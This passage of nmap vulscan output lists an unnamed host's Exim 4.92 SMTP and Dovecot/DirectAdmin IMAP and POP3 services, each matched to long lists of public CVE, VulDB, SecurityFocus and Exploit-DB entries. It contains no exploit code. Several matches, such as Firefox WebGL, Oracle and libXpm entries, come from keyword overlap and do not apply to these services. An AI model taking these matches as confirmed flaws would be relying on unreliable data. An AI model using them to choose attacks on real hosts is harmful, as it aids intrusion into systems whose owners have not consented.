17288587/tcp open smtp Exim smtpd 4.92
17289| vulscan: VulDB - https://vuldb.com:
17290| [141327] Exim up to 4.92.1 Backslash privilege escalation
17291| [138827] Exim up to 4.92 Expansion Code Execution
17292| [135932] Exim up to 4.92 privilege escalation
17293| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
17294|
17295| MITRE CVE - https://cve.mitre.org:
17296| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
17297| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
17298| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
17299| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
17300| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
17301| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
17302| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
17303| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
17304| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
17305| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
17306| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
17307| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
17308| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
17309| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
17310| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
17311| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
17312|
17313| SecurityFocus - https://www.securityfocus.com/bid/:
17314| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
17315| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
17316| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
17317| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
17318| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
17319| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
17320| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17321| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
17322| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
17323| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
17324| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
17325| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
17326| [45308] Exim Crafted Header Remote Code Execution Vulnerability
17327| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
17328| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
17329| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
17330| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
17331| [17110] sa-exim Unauthorized File Access Vulnerability
17332| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
17333| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
17334| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
17335| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
17336| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
17337| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
17338| [6314] Exim Internet Mailer Format String Vulnerability
17339| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
17340| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
17341| [2828] Exim Format String Vulnerability
17342| [1859] Exim Buffer Overflow Vulnerability
17343|
17344| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17345| [84758] Exim sender_address parameter command execution
17346| [84015] Exim command execution
17347| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17348| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17349| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17350| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17351| [67455] Exim DKIM processing code execution
17352| [67299] Exim dkim_exim_verify_finish() format string
17353| [65028] Exim open_log privilege escalation
17354| [63967] Exim config file privilege escalation
17355| [63960] Exim header buffer overflow
17356| [59043] Exim mail directory privilege escalation
17357| [59042] Exim MBX symlink
17358| [52922] ikiwiki teximg plugin information disclosure
17359| [34265] Exim spamd buffer overflow
17360| [25286] Sa-exim greylistclean.cron file deletion
17361| [22687] RHSA-2005:025 updates for exim not installed
17362| [18901] Exim dns_build_reverse buffer overflow
17363| [18764] Exim spa_base64_to_bits function buffer overflow
17364| [18763] Exim host_aton buffer overflow
17365| [16079] Exim require_verify buffer overflow
17366| [16077] Exim header_check_syntax buffer overflow
17367| [16075] Exim sender_verify buffer overflow
17368| [13067] Exim HELO or EHLO command heap overflow
17369| [10761] Exim daemon.c format string
17370| [8194] Exim configuration file -c command-line argument buffer overflow
17371| [7738] Exim allows attacker to hide commands in localhost names using pipes
17372| [6671] Exim "
17373| [1893] Exim MTA allows local users to gain root privileges
17374|
17375| Exploit-DB - https://www.exploit-db.com:
17376| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17377| [15725] Exim 4.63 Remote Root Exploit
17378| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17379| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17380| [796] Exim <= 4.42 Local Root Exploit
17381| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17382|
17383| OpenVAS (Nessus) - http://www.openvas.org:
17384| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17385|
17386| SecurityTracker - https://www.securitytracker.com:
17387| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17388| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17389| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17390| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17391| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17392| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17393| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17394| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17395| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17396| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17397| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17398| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17399|
17400| OSVDB - http://www.osvdb.org:
17401| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17402| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17403| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17404| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17405| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17406| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17407| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17408| [70696] Exim log.c open_log() Function Local Privilege Escalation
17409| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17410| [69685] Exim string_format Function Remote Overflow
17411| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17412| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17413| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17414| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17415| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17416| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17417| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17418| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17419| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17420| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17421| [10032] libXpm CreateXImage Function Integer Overflow
17422| [7160] Exim .forward :include: Option Privilege Escalation
17423| [6479] Vexim COOKIE Authentication Credential Disclosure
17424| [6478] Vexim Multiple Parameter SQL Injection
17425| [5930] Exim Parenthesis File Name Filter Bypass
17426| [5897] Exim header_syntax Function Remote Overflow
17427| [5896] Exim sender_verify Function Remote Overflow
17428| [5530] Exim Localhost Name Arbitrary Command Execution
17429| [5330] Exim Configuration File Variable Overflow
17430| [1855] Exim Batched SMTP Mail Header Format String
17431|_
17432993/tcp open ssl/imap
17433| fingerprint-strings:
17434| NULL:
17435|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
17436995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
17437| vulscan: VulDB - https://vuldb.com:
17438| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
17439| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
17440| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
17441| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
17442| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
17443| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
17444| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17445| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
17446| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
17447| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
17448| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
17449| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17450| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
17451| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
17452| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17453| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17454| [69835] Dovecot 2.2.0/2.2.1 denial of service
17455| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
17456| [65684] Dovecot up to 2.2.6 unknown vulnerability
17457| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17458| [63692] Dovecot up to 2.0.15 spoofing
17459| [7062] Dovecot 2.1.10 mail-search.c denial of service
17460| [62578] DirectAdmin 1.403 cross site scripting
17461| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17462| [57517] Dovecot up to 2.0.12 Login directory traversal
17463| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
17464| [57515] Dovecot up to 2.0.12 Crash denial of service
17465| [54944] Dovecot up to 1.2.14 denial of service
17466| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
17467| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
17468| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
17469| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
17470| [53277] Dovecot up to 1.2.10 denial of service
17471| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
17472| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17473| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17474| [45256] Dovecot up to 1.1.5 directory traversal
17475| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
17476| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17477| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17478| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
17479| [40356] Dovecot 1.0.9 Cache unknown vulnerability
17480| [38747] DirectAdmin 1.30.2 cross site scripting
17481| [38222] Dovecot 1.0.2 directory traversal
17482| [37578] DirectAdmin 1.30.1 cross site scripting
17483| [36376] Dovecot up to 1.0.x directory traversal
17484| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17485| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17486| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
17487| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
17488|
17489| MITRE CVE - https://cve.mitre.org:
17490| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17491| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17492| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
17493| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
17494| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
17495| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
17496| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
17497| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
17498| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
17499| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
17500| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17501| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17502| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
17503| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
17504| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
17505| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
17506| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
17507| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
17508| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
17509| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17510| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17511| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17512| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
17513| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
17514| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
17515| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
17516| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
17517| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
17518| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
17519| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
17520| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
17521| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17522| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
17523| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17524| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
17525| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
17526| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17527| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
17528| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
17529| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17530| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
17531| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
17532| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
17533| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17534| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
17535| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
17536| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
17537| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
17538| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
17539|
17540| SecurityFocus - https://www.securityfocus.com/bid/:
17541| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
17542| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
17543| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
17544| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
17545| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
17546| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17547| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
17548| [67306] Dovecot Denial of Service Vulnerability
17549| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
17550| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17551| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17552| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
17553| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17554| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
17555| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17556| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17557| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
17558| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
17559| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17560| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17561| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17562| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
17563| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
17564| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
17565| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17566| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17567| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
17568| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
17569| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
17570| [39838] tpop3d Remote Denial of Service Vulnerability
17571| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
17572| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17573| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
17574| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
17575| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17576| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17577| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17578| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
17579| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
17580| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
17581| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
17582| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
17583| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
